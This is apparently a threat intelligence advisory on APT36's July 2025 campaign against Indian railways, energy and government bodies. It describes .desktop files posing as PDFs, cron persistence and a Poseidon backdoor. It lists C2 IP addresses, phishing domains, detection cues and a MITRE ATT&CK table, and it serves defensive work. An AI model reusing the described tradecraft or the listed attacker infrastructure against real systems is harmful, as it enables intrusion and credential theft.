In July 2025, threat actor APT36 (also known as Transparent Tribe), a group associated with Pakistan-linked cyber operations, launched a sophisticated campaign targeting India’s critical infrastructure, including railways, oil & gas sectors, and government entities such as the Ministry of External Affairs. This operation marks a shift from their traditional military focus to broader civilian and infrastructure targets, combining phishing with advanced persistence tools.
Severity Level: High
Threat Details
- Initial Access: Delivered via .desktop files posing as PDF documents, exploiting Linux environments through user deception.
- Execution: The malicious .desktop files executed Base64-encoded scripts that downloaded payloads from remote servers and stored them under deceptive filenames (emacs-bin, crond-98).
- Persistence: Persistence was achieved using cron jobs, allowing malware to survive reboots and maintain foothold.
- Command and Control (C2)
- Variant 1: Single C2 IP: 209.38.203.53
- Variant 2: Redundant C2s: 165.232.114.63, 165.22.251.224
- Poseidon C2: 64.227.189.57, 178.128.204.138, 99.83.175.80
- Payload: The second-stage payload was Poseidon, a Mythic C2-based backdoor written in Go. It allowed long-term access, credential harvesting, system reconnaissance, and lateral movement.
- Anti-Analysis Features: Payloads used sleep functions and environment checks to evade sandboxing and dynamic analysis.
- Phishing Infrastructure
Over 100 fake domains mimicking Indian entities such as:- drdo.gov.in.nominationdrdo.report
- mod.gov.in.defencepersonnel.support
- indianarmy.nic.in.ministryofdefenceindia.org
Hosted primarily on AlexHost, known for abuse-tolerant hosting.
- Infrastructure Insights
- Poseidon backdoor operated on port 7443 and showed TLS 1.3 Mythic C2 certificates.
- Pivoting off the infrastructure revealed over 350 Mythic-powered servers, some likely used by other actors.
- Target Sectors: Indian Railways, Oil & Gas Infrastructure, Ministry of External Affairs, and Broader Indian government networks
Recommendations
- Block/alert on emails containing .desktop attachments or disguised .pdf.desktop extensions.
- Detect creation of suspicious cron jobs tied to /dev/shm/, ~/.local/share/ payloads.
- Hunt for processes like emacs-bin, crond-98 being executed by non-root users.
- Reinforce training to hover over links and check file extensions—alert users to .desktop disguised as .pdf.
- Inform users about the risks of downloading or opening files from platforms like Google Drive that impersonate government sources.
- Disallow execution of .desktop files from user downloads or email directories.
- Apply application control (e.g., AppLocker, SELinux, or similar) to prevent execution of unknown binaries/scripts.
- Block the IOCs at their respective controls
https://www.virustotal.com/gui/collection/6cac3abe1178b2a08786dccdf753badb01423f98fd4377030fbc5cca45f3092a/iocs
MITRE ATT&CK
| Tactic | Technique | ID |
| Reconnaissance | Phishing for Information | T1598.002 |
| Initial Access | Spearphishing Attachment | T1566.001 |
| Execution | Command and Scripting Interpreter: Bash | T1059.004 |
| Persistence | Scheduled Task/Job: cron | T1053.003 |
| Boot or Logon Initialization Scripts | T1037.004 | |
| Defense Evasion | Masquerading | T1036 |
| Obfuscated Files or Information | T1027 | |
| Virtualization/Sandbox Evasion | T1497.001 | |
| Credential Access | Credential Phishing | T1566.002 |
| Command and Control | Application Layer Protocol: HTTPS | T1071.001 |
| Multi-hop Proxy | T1090.003 | |
| Web Service | T1102 | |
| Collection | System Information Discovery | T1082 |
| Lateral Movement | Remote File Copy | T1105 |
| Impact | Data Manipulation or Exfiltration | T1565 |
Source:
- https://hunt.io/blog/apt36-india-infrastructure-attacks
Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn
No related posts found.